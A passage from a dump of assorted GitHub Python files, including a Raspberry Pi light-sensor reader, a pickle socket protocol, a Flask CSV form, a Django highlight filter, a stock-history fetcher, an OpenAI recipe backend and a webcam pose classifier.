ds_urls:\n download_dataset(url, dest_dir + \"/\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pierre-guillou/pdiags_bench","sub_path":"download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20431344366","text":"#!/usr/bin/python\n#---------------------------------------------------------------------\n# ___ ___ _ ____\n# / _ \\/ _ \\(_) __/__ __ __\n# / , _/ ___/ /\\ \\/ _ \\/ // /\n# /_/|_/_/ /_/___/ .__/\\_, /\n# /_/ /___/\n#\n# bh1750.py\n# Read data from a BH1750 digital light sensor.\n#\n# Author : Matt Hawkins\n# Date : 26/06/2018\n#\n# For more information please visit :\n# https://www.raspberrypi-spy.co.uk/?s=bh1750\n#\n#---------------------------------------------------------------------\nfrom smbus2 import SMBus\nimport time\nimport threading\nimport LightControl.CustomException as CustomException\nimport LightControl.LightSetting as LightSetting\nimport concurrent.futures\n\nclass MeasureLux():\n def __init__(self):\n self.lux = 0\n \n # Define some constants from the datasheet\n self.DEVICE = 0x23 # Default device I2C address\n\n self.POWER_DOWN = 0x00 # No active state\n self.POWER_ON = 0x01 # Power on\n self.RESET = 0x07 # Reset data register value\n\n # Start measurement at 4lx resolution. Time typically 16ms.\n self.CONTINUOUS_LOW_RES_MODE = 0x13\n # Start measurement at 1lx resolution. Time typically 120ms\n self.CONTINUOUS_HIGH_RES_MODE_1 = 0x10\n # Start measurement at 0.5lx resolution. Time typically 120ms\n self.CONTINUOUS_HIGH_RES_MODE_2 = 0x11\n # Start measurement at 1lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_HIGH_RES_MODE_1 = 0x20\n # Start measurement at 0.5lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_HIGH_RES_MODE_2 = 0x21\n # Start measurement at 1lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_LOW_RES_MODE = 0x23\n\n #bus = smbus.SMBus(0) # Rev 1 Pi uses 0\n #self.bus = SMBus(1) # Rev 2 Pi uses 1\n\n def convertToNumber(self,data):\n # Simple function to convert 2 bytes of data\n # into a decimal number. Optional parameter 'decimals'\n # will round to specified number of decimal places.\n # result=(data[1] + (256 * data[0])) / 1.2. window influence 고려하여 0.4 나누기로 수정\n result=(data[1] + (256 * data[0])) / 0.51\n return (result)\n\n def readLight(self):\n # Read data from I2C interface\n self.bus = SMBus(1) # Rev 2 Pi uses 1\n addr=self.DEVICE\n data = self.bus.read_i2c_block_data(addr,self.ONE_TIME_HIGH_RES_MODE_1,2)\n #read_i2c_blocak_data는 데이터를 1개의 블록(여기서는 list로 처리)로 읽어온다.\n #첫 parameter는 i2c address, 두번째 것은 데이터를 가져올 register 주소인데, 여기서는 정확도 별로 register를 골라쓴다.\n #세번째 것은 읽어올 block의 길이다. 여기서는 2byte를 읽어온다. 반환되는 데이터는 byte로 된 리스트이다.\n \n return self.convertToNumber(data)\n\n def measureLux(self):\n self.lux = int(self.readLight())\n #print(\"측정된 조도 : \" + format(self.lux,'.2f') + \" lx\")\n #time.sleep(0.5)\n return self.lux\n if self.stop_threads:\n raise CustomException.MeasureLuxTerminate\n\ndef work(lightSetting):\n lightSetting.lux = 999\n\nif __name__==\"__main__\":\n global lightSetting\n lightSetting = LightSetting.LightSetting()\n m = MeasureLux()\n\n lightSetting.lux = m.measureLux()\n print('lightSetting.lux :', lightSetting.lux)\n work(lightSetting)\n print('lightSetting.lux :', lightSetting.lux)\n","repo_name":"rkrnru/2021ESWContest_free_1071","sub_path":"LightControl/measureLux.py","file_name":"measureLux.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20715583377","text":"\"\"\"\nThis test is intended to be executed as second-last, just before the re-init test\n(this is why it is prefixed as zzz1)\nBeware: if env TEST_DESTROY_MODE == 1 this test will destroy your database, be careful\n\"\"\"\nimport os\n\nimport pytest\n\nfrom restapi.connectors import Connector\nfrom restapi.exceptions import ServiceUnavailable\nfrom restapi.server import ServerModes, create_app\nfrom restapi.services.authentication import BaseAuthentication\n\n\n# Only executed if tests are run with --destroy flag\n@pytest.mark.skipif(\n not Connector.check_availability(\"authentication\")\n or os.getenv(\"TEST_DESTROY_MODE\", \"0\") != \"1\",\n reason=\"This test needs authentication and TEST_DESTROY_MODE to be enabled\",\n)\ndef test_destroy() -> None:\n auth = Connector.get_authentication_instance()\n\n user = auth.get_user(username=BaseAuthentication.default_user)\n assert user is not None\n\n create_app(name=\"Flask Tests\", mode=ServerModes.DESTROY, options={})\n\n if Connector.check_availability(\"sqlalchemy\"):\n with pytest.raises(ServiceUnavailable):\n auth = Connector.get_authentication_instance()\n user = auth.get_user(username=BaseAuthentication.default_user)\n else:\n auth = Connector.get_authentication_instance()\n user = auth.get_user(username=BaseAuthentication.default_user)\n assert user is None\n","repo_name":"rapydo/http-api","sub_path":"tests/base/test_zzz1_destroy.py","file_name":"test_zzz1_destroy.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"69978121067","text":"import pickle\nfrom socket import socket\nfrom src.protocols.CDProtoBadFormat import CDProtoBadFormat\nfrom src.protocols.Serializer import Serializer\n \n\nclass Pickle_P:\n\n @classmethod\n def send_msg(cls, connection: socket, msg):\n #Sends through a connection a Message object.\n\n serialize = Serializer.PICKLE.value\n serialize = serialize.to_bytes(1, 'big')\n messageToSend = pickle.dumps(msg.getMessage());\n messageSize = len(messageToSend)\n\n byteMessage = messageSize.to_bytes(2, 'big');\n connection.send(serialize + byteMessage + messageToSend)\n\n @classmethod\n def recv_msg(cls, connection: socket):\n #Receives through a connection a Message object.\n\n messageSize = int.from_bytes(connection.recv(2), 'big')\n \n if messageSize == 0:\n return\n\n try:\n data = connection.recv(messageSize)\n return pickle.loads(data)\n except:\n raise CDProtoBadFormat(data)","repo_name":"fungame2270/Message_broker","sub_path":"src/protocols/pickle_protocol.py","file_name":"pickle_protocol.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29516383654","text":"from flask import Flask,redirect,url_for,request,render_template\n\nimport pandas as pd\n\n\napp=Flask(__name__)\n\n@app.route('/newbill',methods=['POST','GET'])\ndef login():\n if request.method=='POST':\n user=request.form['nm']\n price=request.form['price']\n dict1={'item':[user],'price':[price]}\n df=pd.read_csv(r\"items.csv\",index_col=0)\n ind = df.tail(1).index\n df.loc[ind[0] + 1] = [user,price]\n print(df)\n df.to_csv('/Users/rekha/Documents/items.csv')\n return (render_template('user.html', name=user))\n else:\n user=request.args.get('nm')\n return redirect(url_for('success',name=user))\nif __name__=='__main__':\n app.run(debug=True)\n","repo_name":"rekha75s/flasky","sub_path":"csvread.py","file_name":"csvread.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6388826295","text":"from django import template\nfrom re import IGNORECASE, compile, escape as rescape\nfrom django.utils.safestring import mark_safe\n\n\nregister = template.Library()\n\n@register.filter(name='highlight')\ndef highlight(text, search):\n rgx = compile(rescape(search), IGNORECASE)\n return mark_safe(\n rgx.sub(\n lambda m: '{}'.format(m.group()),\n text\n )\n )\n\n@register.filter(name='underline')\ndef underline(text, search):\n rgx = compile(rescape(search), IGNORECASE)\n return mark_safe(\n rgx.sub(\n lambda m: '{}'.format(m.group()),\n text\n )\n )\n","repo_name":"django-daiquiri/daiquiri","sub_path":"daiquiri/files/templatetags/search_highlight.py","file_name":"search_highlight.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"10161782475","text":"import logging\nimport csv\nimport multiprocessing\nimport threading\nimport pandas as pd\nimport operator\nfrom queue import Queue, Empty\nfrom pprint import pformat\nfrom pathlib import Path\nfrom multiprocessing.pool import ThreadPool\nimport itertools\n\nfrom tasks import (\n DataFetchingTask,\n DataCalculationTask,\n DataAggregationTask,\n DataAnalyzingTask,\n)\nfrom utils import CITIES\nfrom settings import (\n RESULT_PATH,\n RESP_PATH,\n CALC_PATH,\n ANALYZED_PATH,\n DATA_FETCH_NUM_THREADS,\n CALC_NUM_PROCESSES,\n ANALYZE_NUM_PROCESSES,\n)\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(\n handlers=[logging.FileHandler(filename='app.log', mode='w')],\n level=logging.DEBUG,\n format='%(process)d: %(asctime)s: %(levelname)s - %(message)s'\n)\n\n\nclass NotEnoughData(Exception):\n pass\n\ndef create_folders():\n Path(RESP_PATH).mkdir(parents=True, exist_ok=True)\n Path(CALC_PATH).mkdir(parents=True, exist_ok=True)\n Path(ANALYZED_PATH).mkdir(parents=True, exist_ok=True)\n\ndef rank_analyzed_data(data: list):\n \n data = list(itertools.filterfalse(lambda item: not item , data))\n if data.__len__() < 1:\n message = 'Not enough data to form a rating!'\n logger.error(message)\n raise NotEnoughData(message)\n \n data = sorted(data, key=operator.itemgetter('relevant_cond_hours'), reverse=True)\n data = sorted(data, key=operator.itemgetter('temp_avg'), reverse=True) \n\n rank = 1\n data[0]['rank'] = rank\n for i in range(1, data.__len__()):\n if data[i-1]['temp_avg'] != data[i]['temp_avg'] or data[i-1]['relevant_cond_hours'] != data[i]['relevant_cond_hours']:\n rank += 1\n data[i]['rank'] = rank\n\n logger.debug('Ranked list created:')\n logger.debug(pformat(data))\n\n return data\n\ndef forecast_weather(cities: dict, result_path = RESULT_PATH):\n \"\"\"\n Анализ погодных условий по городам\n \"\"\"\n\n create_folders()\n\n fetchQueue = Queue()\n calcQueue = multiprocessing.Queue()\n analyzeQueue = multiprocessing.Queue()\n aggregationQueue = multiprocessing.Queue()\n\n [fetchQueue.put((city, url)) for city, url in cities.items()]\n\n fetchThreads = []\n for _ in range(DATA_FETCH_NUM_THREADS):\n thread = DataFetchingTask(calcQueue, fetchQueue, RESP_PATH)\n fetchThreads.append(thread)\n thread.start()\n\n for thread in fetchThreads:\n thread.join()\n\n calcProcesses = []\n for _ in range(CALC_NUM_PROCESSES):\n process = DataCalculationTask(calcQueue, analyzeQueue, CALC_PATH)\n calcProcesses.append(process)\n process.start()\n \n for proc in calcProcesses:\n proc.join()\n\n toAnalyze = []\n while True:\n try:\n (city, path) = analyzeQueue.get(timeout=0.01)\n toAnalyze.append((city, path, ANALYZED_PATH))\n\n except Empty:\n logger.debug('Main: analyzeQueue empty!')\n break\n \n ordered = []\n with multiprocessing.Pool(ANALYZE_NUM_PROCESSES) as pool:\n result = pool.starmap_async(DataAnalyzingTask.run, toAnalyze)\n ordered = result.get()\n\n logger.debug('DataAnalyzingTask: Thread ended.')\n\n ordered = rank_analyzed_data(ordered)\n\n result_lock = threading.Lock()\n items = [(item['path'], item['rank'], result_lock, result_path) for item in ordered]\n \n with open(ordered[0]['path'], 'r') as csvFile:\n reader = csv.reader(csvFile)\n cols = ','.join(next(reader)) + ',Рейтинг\\n'\n \n with open(result_path, newline='', mode='w') as f:\n f.write(cols)\n \n with ThreadPool() as pool:\n for _ in pool.starmap(DataAggregationTask.run, items):\n logger.debug('Thread ended.')\n\n logger.info(f'Город-победитель: {ordered[0][\"city\"]}')\n\n\nif __name__ == \"__main__\":\n forecast_weather(CITIES)\n","repo_name":"angr1it/async-python-sprint-1","sub_path":"forecasting.py","file_name":"forecasting.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30155912326","text":"import json\nimport openai\nimport sqlite3\nimport random\nimport requests\nimport logging\n\nfrom customError import CustomError\n\nRECIPES_PER_REQUEST = 5\nIMAGE_DIR = '/Users/andylegrand/xcode/gptfood/Backend/tests/images/'\n\ndebug = True # if set to true the backend will not call the openai api and will instead return example responses\n\nerrorCodes = json.loads(open('errorCodes.json', 'r').read())\n\ndef genRecipesApiCall(ingredients, usedRecipes, proomptPath='proomps/genRecipeList.txt'):\n \"\"\"\n Calls openai api to generate recipes given ingredients.\n @param ingredients: list of ingredients representing available ingredients\n @param usedRecipes: list of recipes representing recipes that have already been used\n @raise CustomError: if the response from the api is not valid json\n @return: extracted text from response\n \"\"\"\n\n # Form list of ingredients in string form\n ingredient_string = ''\n for ingredient in ingredients:\n ingredient_string += ingredient + '\\n'\n\n # Form list of used recipes in string form\n used_recipe_string = ''\n for recipe in usedRecipes:\n used_recipe_string += '{' + recipe + '}\\n'\n\n # Form proompt\n proompt = open(proomptPath, 'r').read()\n proompt = proompt.replace('[ingredients]', ingredient_string)\n proompt = proompt.replace('[used]', used_recipe_string)\n\n # Call openai api\n openai.api_key = open('/Users/andylegrand/xcode/gptfood/Backend/key.txt', 'r').read()\n logging.debug(\"key: \" + openai.api_key)\n\n try:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=proompt,\n temperature=1,\n max_tokens=1024,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n assert response.choices[0].text != None\n \n logging.debug(f\"APIResponse: {response.choices[0].text}\")\n\n return response.choices[0].text\n except:\n raise CustomError(proompt, errorCodes[\"GPT_API_ERROR\"])\n \ndef addRecipeToDatabase(recipe, ingredients, connection):\n \"\"\"\n Adds a list of recipes to the database.\n @param recipes: string representing the recipe\n @param ingredients: list of strings representing the ingredients\n @param connection: connection to the database\n @return: None\n \"\"\"\n cursor = connection.cursor()\n\n # Add the recipe to the database\n cursor.execute(\"\"\"\n INSERT INTO recipes (name, directions, imagePath) VALUES (?, NULL, NULL);\n \"\"\", (recipe,))\n recipeId = cursor.lastrowid\n\n # Add the ingredients to the database\n ingredientIds = []\n for ingredient in ingredients:\n cursor.execute(\"\"\"\n INSERT OR IGNORE INTO ingredients (name) VALUES (?);\n \"\"\", (ingredient,))\n ingredientIds.append(cursor.lastrowid)\n\n # Add the relations to the database\n for ingredientId in ingredientIds:\n cursor.execute(\"\"\"\n INSERT INTO relations (recipe_id, ingredient_id) VALUES (?, ?);\n \"\"\", (recipeId, ingredientId))\n \n connection.commit()\n\ndef generateAndAddRecipes(ingredients, usedRecipes, connection):\n \"\"\"\n Generates recipes and adds them to the database.\n @param ingredients: list of ingredients representing available ingredients\n @param usedRecipes: list of recipes representing recipes that have already been used\n @param connection: connection to the database\n @raise CustomError: if the response from the api is not valid json\n @return: None\n \"\"\"\n completionText = None\n if not debug:\n completionText = genRecipesApiCall(ingredients, usedRecipes)\n else:\n completionText = open('sampleresponse.txt', 'r').read()\n \n # Load the text as JSON, abort and throw an error if it fails\n try:\n recipes = json.loads(completionText)\n except:\n raise CustomError(f\"Error parsing JSON: {completionText}\", errorCodes[\"JSON_PARSE_ERROR\"])\n\n\n for recipe in recipes:\n addRecipeToDatabase(recipe[\"name\"], recipe[\"ingredients\"], connection)\n\ndef queryDatabaseRecipes(ingredients, usedRecipes, connection):\n cursor = connection.cursor()\n\n # Fetch all recipe names from the database, then randomize the order\n cursor.execute('SELECT name FROM recipes')\n all_recipes = [row[0] for row in cursor.fetchall()]\n random.shuffle(all_recipes)\n\n # Fetch corresponding ingredient ids from the database\n placeholders = ', '.join('?' for ingredient in ingredients)\n cursor.execute(f\"SELECT id FROM ingredients WHERE name IN ({placeholders})\", ingredients)\n ingredient_ids = set(row[0] for row in cursor.fetchall())\n\n # Find the recipes whose ingredients are all in the provided list\n matching_recipes = []\n for recipe in all_recipes:\n if recipe in usedRecipes:\n continue\n\n # Fetch the ingredients for this recipe from relations\n cursor.execute('''\n SELECT ingredient_id\n FROM relations\n JOIN recipes ON relations.recipe_id = recipes.id\n WHERE recipes.name = ?\n ''', (recipe,))\n recipe_ingredient_ids = set(row[0] for row in cursor.fetchall())\n\n # Loop through the ingredients and check if they are all in the provided list. If so, add the recipe to matching_recipes\n if recipe_ingredient_ids.issubset(ingredient_ids):\n matching_recipes.append(recipe)\n\n if len(matching_recipes) == RECIPES_PER_REQUEST:\n break\n\n return matching_recipes\n\ndef getRecipes(ingredients, usedRecipes, databasePath):\n if debug:\n return [\"Recipe 1\", \"Recipe 2\", \"Recipe 3\", \"Recipe 4\", \"Recipe 5\"]\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n\n # Query database. If there are not enough recipes to fufill the request generate more and try again\n recipes = queryDatabaseRecipes(ingredients, usedRecipes, conn)\n \n if len(recipes) < RECIPES_PER_REQUEST:\n generateAndAddRecipes(ingredients, usedRecipes, conn)\n recipes = queryDatabaseRecipes(ingredients, usedRecipes, conn)\n \n conn.close()\n return recipes\n\ndef genDirectionsApiCall(recipe, ingredients):\n \"\"\"\n Calls openai api to generate directions given a recipe.\n @param recipe: string representing the recipe\n @return: text response from openai\n \"\"\"\n\n # Form list of ingredients in string form\n ingredient_string = ''\n for ingredient in ingredients:\n ingredient_string += ingredient + '\\n'\n\n # Form proompt\n proompt = open('proomps/genDirections.txt', 'r').read()\n proompt = proompt.replace('[recipe]', recipe)\n proompt = proompt.replace('[ingredients]', ingredient_string)\n\n # Call openai api\n openai.api_key = open('key.txt', 'r').read()\n\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=proompt,\n temperature=1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n return response.choices[0].text\n\ndef downloadImage(url, path):\n \"\"\"\n Downloads an image from a url and saves it to a path.\n @param url: url of the image\n @param path: path to save the image to\n @return: None\n \"\"\"\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(path, 'wb') as f:\n f.write(response.content)\n\ndef genImageApiCall(description):\n \"\"\"\n Calls openai api to generate an image given a description.\n @param description: string representing the description\n @return: url of the generated image\n \"\"\"\n openai.api_key = open('key.txt', 'r').read()\n\n response = openai.Image.create(\n prompt=description,\n n=1,\n size=\"256x256\"\n )\n image_url = response['data'][0]['url']\n return image_url\n\ndef addDirectionsToDatabase(recipe, directions, imagePath, connection):\n \"\"\"\n Adds directions and image path to the database.\n @param recipe: string representing the recipe\n @param directions: string representing the directions\n @param imagePath: string representing the path to the image\n @param connection: connection to the database\n @return: None\n \"\"\"\n\n cursor = connection.cursor()\n\n # Add directions and image path to database\n cursor.execute(\"\"\"\n UPDATE recipes SET directions = ?, imagePath = ? WHERE name = ?;\n \"\"\", (directions, imagePath, recipe))\n\n connection.commit()\n\n\ndef generateAndAddDirections(recipe, connection, imagePath):\n \"\"\"\n Generates directions and adds them to the database.\n @param recipe: string representing the recipe\n @param connection: connection to the database\n @return: None\n \"\"\"\n\n # Get ingredients from database\n cursor = connection.cursor()\n\n # get recipe id\n cursor.execute('SELECT id FROM recipes WHERE name = ?', (recipe,))\n\n if cursor.fetchone() == None:\n raise CustomError(f\"Recipe {recipe} not found in database\", errorCodes[\"RECIPE_NOT_FOUND\"])\n\n # get ingredients\n cursor.execute('''\n SELECT ingredients.name\n FROM ingredients\n JOIN relations ON ingredients.id = relations.ingredient_id\n JOIN recipes ON relations.recipe_id = recipes.id\n WHERE recipes.name = ?\n ''', (recipe,))\n ingredients = [row[0] for row in cursor.fetchall()]\n\n logging.debug(f\"Ingredients: {ingredients}\")\n\n # Add the directions to the database\n res = genDirectionsApiCall(recipe, ingredients)\n\n # Convert to json, extract directions and image proompt. Abort and throw an error if it fails\n try:\n js = json.loads(res)\n directions = js[\"directions\"]\n imageProompt = js[\"dall-e prompt\"]\n except:\n raise CustomError(f\"Error parsing JSON: {res}\", errorCodes[\"JSON_PARSE_ERROR\"])\n\n # Generate image\n imageUrl = genImageApiCall(imageProompt)\n imagePath = imagePath + recipe + '.png'\n downloadImage(imageUrl, imagePath)\n\n # Add directions and image path to database\n addDirectionsToDatabase(recipe, directions, imagePath, connection)\n\ndef getDirections(recipe, databasePath):\n \"\"\"\n Query database. If the current recipe does not have directions generate them and try again\n @param recipe: string representing the recipe\n @param databasePath: path to the database\n @return: directions for the recipe\n \"\"\"\n if debug:\n return \"Directions for \" + recipe\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n cursor = conn.cursor()\n\n # Check if recipe has directions\n cursor.execute('SELECT directions FROM recipes WHERE name = ?', (recipe,))\n directions = cursor.fetchone()[0]\n\n if directions == None:\n generateAndAddDirections(recipe, conn, IMAGE_DIR)\n cursor.execute('SELECT directions FROM recipes WHERE name = ?', (recipe,))\n directions = cursor.fetchone()[0]\n\n conn.close()\n return directions\n\n\ndef getImage(recipe, databasePath):\n \"\"\"\n Returns path to the image for the recipe. This function should be called after getDirections, so the image should already be generated.\n @param recipe: string representing the recipe\n @param databasePath: path to the database\n @return: path to the image\n \"\"\"\n if debug:\n return \"/Users/andylegrand/xcode/gptfood/Backend/exampleResponses/exampleImage.png\"\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n cursor = conn.cursor()\n\n # Check if recipe has directions\n cursor.execute('SELECT imagePath FROM recipes WHERE name = ?', (recipe,))\n imagePath = cursor.fetchone()[0]\n if imagePath == None:\n raise CustomError(f\"Image for {recipe} not found in database\", errorCodes[\"IMAGE_NOT_FOUND\"])\n\n conn.close()\n return imagePath\n","repo_name":"andyllegrand/gptfood","sub_path":"Backend/requestHandler.py","file_name":"requestHandler.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20196886822","text":"class Node:\n def __init__(self, value: int = 0, prev=None, next=None):\n self.value = value\n self.prev = prev\n self.next = next\n\n\nclass MyCircularDeque:\n def __init__(self, k: int):\n self.k = k\n self.count = 0\n self.head = None\n self.tail = None\n\n def insertFront(self, value: int) -> bool:\n if self.isFull():\n return False\n if not self.head:\n self.head = Node(value)\n self.tail = self.head\n self.count += 1\n return True\n prev_head = self.head\n self.head = Node(value, next=prev_head)\n prev_head.prev = self.head\n self.count += 1\n return True\n\n def insertLast(self, value: int) -> bool:\n if self.isFull():\n return False\n if not self.head:\n self.head = Node(value)\n self.tail = self.head\n self.count += 1\n return True\n self.tail.next = Node(value, self.tail)\n self.tail = self.tail.next\n self.count += 1\n return True\n\n def deleteFront(self) -> bool:\n if not self.head:\n return False\n self.head = self.head.next\n if self.head:\n self.head.prev = None\n self.count -= 1\n return True\n\n def deleteLast(self) -> bool:\n if not self.head:\n return False\n self.tail = self.tail.prev\n if self.tail:\n self.tail.next = None\n else:\n self.head = None\n self.count -= 1\n return True\n\n def getFront(self) -> int:\n if not self.head:\n return -1\n return self.head.value\n\n def getRear(self) -> int:\n if not self.head:\n return -1\n return self.tail.value\n\n def isEmpty(self) -> bool:\n return self.count == 0\n\n def isFull(self) -> bool:\n return self.count == self.k\n","repo_name":"miruts-xz/competitive-programming","sub_path":"weeks/week-2/day-7/design_circular_deque.py","file_name":"design_circular_deque.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13024329839","text":"from mo.front.extractor import FrontExtractorOp\nfrom mo.ops.eltwise_ninputs_in_1 import EltwiseNin1\nfrom mo.front.kaldi.utils import read_token_value\n\n\nclass ElementwiseProductComponentFrontExtractor(FrontExtractorOp):\n op = 'elementwiseproductcomponent'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n pb = node.parameters\n\n indim = read_token_value(pb, b'')\n outdim = read_token_value(pb, b'')\n num_inputs = indim / outdim\n\n attrs = {'num_inputs': int(num_inputs),\n 'operation': 'mul'}\n\n EltwiseNin1.update_node_stat(node, attrs)\n return cls.enabled\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/mo/front/kaldi/extractors/elementwise_component_ext.py","file_name":"elementwise_component_ext.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"72521048106","text":"#########################################################################################################################\n# IMPORT STATEMENTS\n#########################################################################################################################\n\n# for reading in configurations and paths\nimport logging\n## FIXME: stockretriever needs to be rewritten to be compatible with python3\n# import configparser\nimport os\nimport ntpath\n\n# library for retrieving stocks via yql from yahoo finance\nimport stockretriever as stocks\n\n# for writing stock data\nimport csv\nimport sys\n\nimport pprint\nimport multiprocessing\nimport time\n#########################################################################################################################\n# CONFIGURATIONS\n#########################################################################################################################\n\n# Setup for Logging, Global Variable Definitions, \n# logging.basicConfig(filename='etl/LocationCounter.log',level=logging.INFO,format='%(asctime)s %(levelname)s: %(message)s')\n# config = configparser.ConfigParser()\n# config.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),\"../\",\"crawlers/\",\"newscrawler.conf\"))\nrun_path = os.path.abspath(os.path.dirname(__file__))\nlogging.basicConfig(filename='yahooFinance.log',level=logging.INFO,format='%(asctime)s %(levelname)s: %(message)s')\n\noutput_path = run_path +\"/stockdata/\"\noutput_file = output_path + 'stockdata.csv'\nnasdaq_file = run_path + \"/nasdaq_list.csv\"\n\n# Setup CSV File for Writing Stocks\n# Functions for output file formatting\ndef writeStockdataHeader(output_file):\n\tif not os.path.exists(output_path):\n\t\tos.makedirs(output_path)\n\n\tif os.path.isfile(output_file):\n\t\tos.remove(output_file)\n\t''' Write Header to the Stock Price Output File '''\n\twith open(output_file, 'w') as csvfile:\n\t\tarticleWriter = csv.writer(csvfile, delimiter='~',quoting=csv.QUOTE_ALL)\n\t\tarticleWriter.writerow([\"Symbol\",\"Date\",\"High\",\"Low\",\"Close\",\"AdjClose\",\"Open\",\"Volume\"])\n\t\n\treturn\n\ndef writeStockdataRow(output_file, symbol,date,high,low,close,adjclose,opn,volume):\n\t''' Logic for writing a stock date row, needs to be moved to a single threaded function '''\n\t\n\t# csv_start = time.time()\n\tlogging.debug(\"Metadata path is {}\".format(output_file))\n\n\t#Write metadata and reference to full text file name to csv separated by ~ character\n\twith open(output_file, 'a') as csvfile:\n\t\tWriter = csv.writer(csvfile, delimiter='~',quoting=csv.QUOTE_ALL)\n\t\tWriter.writerow([symbol,date,high,low,close,adjclose,opn,volume])\n\t# logging.debug(\"CSV write completed to {} in {} seconds\".format(output_file,time.time()- csv_start))\n\t\n\treturn\n\ndef readNasdaqList():\n\t''' Pulls names of NASDAQ tickers into an array from CSV file '''\n\n\ttickers = []\n\twith open(nasdaq_file, 'r') as csvfile:\n\t\tcsvReader = csv.reader(csvfile, delimiter=',')\n\t\tnext(csvReader)\n\t\tfor row in csvReader:\n\t\t\ttickers.append(row[0])\n\n\treturn tickers\n\n# Get current stock information - returns most of \n# the information on a typical Yahoo! Finance stock page\n# info = stocks.get_current_info([\"YHOO\",\"AAPL\",\"GOOG\",\"MSFT\"])\n# print info\n\n# Get current stock news - returns the RSS feed for\n# the given ticker in JSON format\n# news = stocks.get_news_feed('YHOO')\n\n# Get historical prices - returns all historical\n# open/low/high/close/volumn for thie given ticker\n\n\n\ndef processStockData(ticker):\n\t\n\tstock_data = fetchStockData(ticker)\n\tparseStockData(stock_data)\n\ndef fetchStockData(ticker):\n\tstock_data = {}\n\n\ttry:\n\t\tprint(\"Fetching for:\" + ticker)\n\t\tstock_data[ticker] = stocks.get_historical_info(ticker)\n\t\t# pprint.pprint(stock_data[ticker])\n\t\t\n\texcept KeyError:\n\t\tprint(\"Key not found:\" + ticker) \n\texcept stocks.NoResultsError:\n\t\tprint(\"No Results found for:\" + ticker)\n\n\treturn stock_data\n\ndef parseStockData(stock_data):\n\tfor ticker in stock_data:\n\t\tfor date in stock_data[ticker]:\n\t\t\tprint(\"Writing for\" + ticker, date['Date'])\n\t\t\twriteStockdataRow(output_file, ticker,\n\t\t\t\tdate[\"Date\"], \n\t\t\t\tdate[\"High\"], \n\t\t\t\tdate[\"Low\"], \n\t\t\t\tdate[\"Close\"], \n\t\t\t\tdate[\"AdjClose\"], \n\t\t\t\tdate[\"Open\"], \n\t\t\t\tdate[\"Volume\"])\n\ndef main():\n\ttickers = readNasdaqList()\n\t\n\twriteStockdataHeader(output_file)\n\t\n\tpool = multiprocessing.Pool()\n\tpool.map(processStockData,tickers)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dviator/dsforthepeople","sub_path":"stocks/fetch_nasdaq_history.py","file_name":"fetch_nasdaq_history.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4918517865","text":"import mediapipe as mp # Import mediapipe\nimport cv2 # Import opencv\nimport time\nimport os\nimport datetime\nfrom threading import Thread\nfrom queue import Queue\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score # Accuracy metrics \nimport pickle\n\nmp_drawing = mp.solutions.drawing_utils # Drawing helpers\nmp_holistic = mp.solutions.holistic # Mediapipe Solutions\n\nwith open('body_language.pkl', 'rb') as f:\n model = pickle.load(f)\n \nuser = open('user.txt',\"r\")\nuser=user.read()\n\nclass Camera:\n def __init__(self, mirror=False):\n self.data = None\n self.cam = cv2.VideoCapture(0)\n\n self.WIDTH = 640\n self.HEIGHT = 480\n\n self.center_x = self.WIDTH / 2\n self.center_y = self.HEIGHT / 2\n self.touched_zoom = False\n self.image_queue = Queue()\n self.video_queue = Queue()\n\n self.scale = 1\n self.__setup()\n\n self.mirror = mirror\n\n def __setup(self):\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.WIDTH)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.HEIGHT)\n time.sleep(2)\n\n def get_location(self, x, y):\n self.center_x = x\n self.center_y = y\n self.touched_zoom = 